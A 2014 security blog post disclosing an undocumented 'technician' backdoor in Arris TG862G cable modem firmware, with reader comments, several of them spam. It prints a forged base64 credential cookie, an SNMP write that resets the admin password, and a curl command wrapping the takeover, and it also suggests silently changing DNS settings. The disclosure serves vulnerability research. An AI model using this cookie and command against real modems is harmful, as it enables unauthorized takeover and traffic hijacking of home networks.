Tuesday, September 23, 2014

Arris Cable Modem Backdoor - I'm a technician, trust me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
And after base64 decoding the "credential" value we get:
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
And finally:
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","",4);
Appears that the OID "" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' ';4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


  1. Ya this is really disappointing . I did a talk with a friend a couple years back at HOPE NYC documenting a lot of these insane vulnerabilities in the Arris devices and its very upsetting that two years later people are still finding the same type of issues. Check out http://www.forbes.com/sites/andygreenberg/2012/07/13/researchers-say-time-warner-cable-and-comcast-distribute-wifi-routers-lacking-the-most-rudimentary-security/ You may want to reach out to Andy and give him an update ;)

  2. "-TS070563_092012_MODEL_862_GW"
    Modem hadn't been updated. since Sept 20, 2012

    Here's one that had, on March 21, 2014:
    Software Image Name:TS070659S_032114_MODEL_862_GW_CT

  3. Interesting blog. This is one of my favorite blog also I want you to update more post like this. Thanks for sharing this article.
    Cable operators in Chennai

  4. hahahahaha, amazing. Reminds me once I had a Qwest modem that came with a source code disc in the box.

    I'm using a TG862G, HW #5, TS070686H_081514_MODEL_862_GW
    Looks like an older FW version, but mine doesn't use cookies at all.
    It seems to be using an internal user memory, I'll play around with this exploit sometime anyways.

    I actually had to dig through the HTML to get the FW version, which they so kindly commented out of the software page. They managed to use JQuery and still make the UI look like garbage. Arris has so much background making modems, you'd think I could have some better features such as data statistics and a device list that's interactive and actually works (70% of the computers it's seen on my network show up as UNKNOWN).

    I'm thankful that it's somewhat useful(solid port forwarding, static IPs, white/black listing), but damn.

  5. Hi, what version of burp suite is that?

  6. Hi. I own Arris TG862G, TWC pushed their firmware on it, it seems much older than discussed here.
    Firmware Name: TS070563C_032913_MODEL_862_GW_TW_SIP_PC20 Firmware Build Time: Fri Mar 29 2013
    I got a permanent password to advanced page/technician. But I don't have URL, it's 404 and as a result I don't know how to enable SSH. Can anyone help with this old firmware?

  7. been in contact with cogeco as they make wide use of the arris modems been told they are secure due to all hacks " needing physical access to the modems" I'm not able to explain if this is wrong or not to them and was hoping someone might be able to assist me in the method to demonstrate if the modem is hackable without physical access

  8. Your router has been compromised and your network connections are being routed through a malicious remote server. Avast informed me

    Getting hits from markmonitor in tcpview in sysinternalsuite. Using arris wbm760a docsis 3.0 . Inside command promt under ipconfig im not show any default gateway

    Im considering scrapping Os an prolly from torrents, have vpn now. but im infected computer cant find any viruses and malwarebytes isnt detecting anything either but i cant get into my router.

  9. [System Process] 0 TCPV6 [2001:558:6015:1:61c3:51cc:54ee:80f7] 49933 mia07s25-in-x08.1e100.net https TIME_WAIT

  10. Pretty nice post. I have in fact enjoyed reading your website posts. I have been googling blogs and sites in related manner recently and i have to state you have a nice
    Pass Box manufacturers

  11. How can you tell if your Manufacturer ARRIS
    Model Number NVG599

    has be compromised or has had someone try to compromise it?
    rparkerfl1 at the aol place for DM

  12. This comment has been removed by the author.

  13. HTTP/1.1 401 Unauthorized
    Status: 401 Denied! - loser
    Transfer-Encoding: chunked
    Server: lighttpd

    i think they fixed it ;)

  14. This is useful and very Wonderful post, Thanks for shearing something like this article. I like this a whole lot.

    Free Trial Mcx Commodity Tips

  15. if only all offered the same content as you, the internet would be a far better place..

    Hni Trading Tips

  16. am very late ... thanks and take look on netgear R6200 last firmware version and remember your post 0_^

  17. A great blog with good information. Thanks for sharing such a nice information.!!

    data cabling toronto

  18. I have a arris tg862g modem trying to do it but dont know what I need to do so.
    please help

  19. same here what is this password thing on the HSD to access the Advance features how do you get into that

  20. Thanks for sharing useful information. I like your blog.!!

    electrician toronto

  21. I need to know about TG2492LG Arris cable modem,swoft/frimware.... To programming chip....

  22. Hey, that’s really a good post on pets for sale in Delhi, i really like your blog as the information is very useful if you are a pet lover. Well, there is one more site for the same service www.helpadya.com you should check it for more detail.

  23. I like your blog, I think it is quite different concept but quite knowledgeable but I am aware with one more website which is famous for Free Classified Ads Posting Sites www.helpadya.com  www.helpadya.com

  24. This comment has been removed by the author.

  25. In This Post, We will explain How to Install Your Netgear Router With Your Internet Modem. We Will Also Guide You in detail All Tricks That You Can Try While Installing Netgear Wireless Router.
    Netgear Setup

  26. Has anyone managed to decrypt an arris DG2460a router.data file?